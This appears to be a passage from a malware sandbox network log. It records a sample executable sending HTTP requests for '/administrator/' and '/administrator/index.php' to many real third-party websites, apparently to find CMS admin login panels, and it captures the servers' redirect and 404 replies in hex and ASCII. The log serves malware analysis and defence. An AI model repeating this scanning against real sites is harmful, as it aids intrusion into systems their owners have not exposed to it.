                                                                                                                                                                                                    Nov 26, 2023 06:59:30.720422983 CET758INData Raw: 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35
                                                                                                                                                                                                    Data Ascii: xt-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="round" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-wei
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.825611115 CET288OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: octetpowers.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://octetpowers.in/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.155014038 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Expires: 0
                                                                                                                                                                                                    Content-Length: 1699
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.155031919 CET720INData Raw: 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20
                                                                                                                                                                                                    Data Ascii: 100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="round" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-weight="900" font-size="42px">!</text>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    30192.168.2.4517663.111.240.6806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.390585899 CET227OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.687223911 CET569INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://knu.ac.in/administrator/
                                                                                                                                                                                                    Content-Length: 299
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6b 6e 75 2e 61 63 2e 69 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://knu.ac.in/administrator/">here</a>.</p><hr><address>Apache Server at knu.ac.in Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    31192.168.2.45518054.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.395590067 CET230OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.491748095 CET591INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                    Location: https://ce-logic.com/administrator/
                                                                                                                                                                                                    Content-Length: 321
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ce-logic.com/administrator/">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at ce-logic.com Port 80</address></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.550447941 CET285OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://ce-logic.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.644140005 CET609INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                    Location: https://ce-logic.com/administrator/index.php
                                                                                                                                                                                                    Content-Length: 330
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ce-logic.com/administrator/index.php">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at ce-logic.com Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    32192.168.2.455113191.6.210.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.395766973 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: esistem.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.617113113 CET762INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                                                                                                                                                                    ETag: "1e8-595ad1aad5040"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 488
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.822706938 CET288OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: esistem.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://esistem.com.br/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.043448925 CET762INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                                                                                                                                                                    ETag: "1e8-595ad1aad5040"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 488
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    33192.168.2.453344185.230.63.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.404530048 CET234OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.534198046 CET896INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    location: https://www.linkan-group.com/administrator
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    x-wix-request-id: 1700978370.443103319797519345
                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42
                                                                                                                                                                                                    X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrb3eKb2faxipHpDHW1Enb5/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalveHi8sq+ETLoQsgLlInIymrDYiGWBW044EMoSWtXBIZ6+FADXC+YqrdjLt28/RyMw==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,HGBagNbHaHjyb4d/UK6fckbYqB6/hwX5/SRH1bPtEcQ=,1TnztLIEn9oM+NgebUxhZWunrbwcx7Ajica9WZCxGPE=,znHLAI6vxugFKypFMbJjohE+8x/tk7l8GwSAJmCSTgCYAUFYY3pK7mBx1XtgArCQMbNKQ6oO/j9crZ4+jsEe9A==
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.536748886 CET296OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.linkan-group.com/administrator
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.664364100 CET906INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    location: https://www.linkan-group.com/administrator/index.php
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    x-wix-request-id: 1700978372.575103319797529345
                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42
                                                                                                                                                                                                    X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrb3eKb2faxipHpDHW1Enb5/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalpr2vHC9EANr4T/nhnY9G7lggQGXZF0eQR2Hsm41o7Kx0soKmPMV4zy+MD2YOTjcjg==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,XPSEbViGktM5KJDgDuw8UHa9j4OmBWfXgbLIhHV5ODI=,RilQpzIg8kSf1FJ4PYuX88X6E4uNi98OLpA9Jeo658E=,znHLAI6vxugFKypFMbJjoh1zLox+yt7/MCIOTdQIIyODvZC2Qmnm+2HKFQQAJVVqwkKwl49dc6VhNKJUDIjnTA==
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    34192.168.2.45335078.128.62.138806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.405090094 CET241OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.610302925 CET602INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
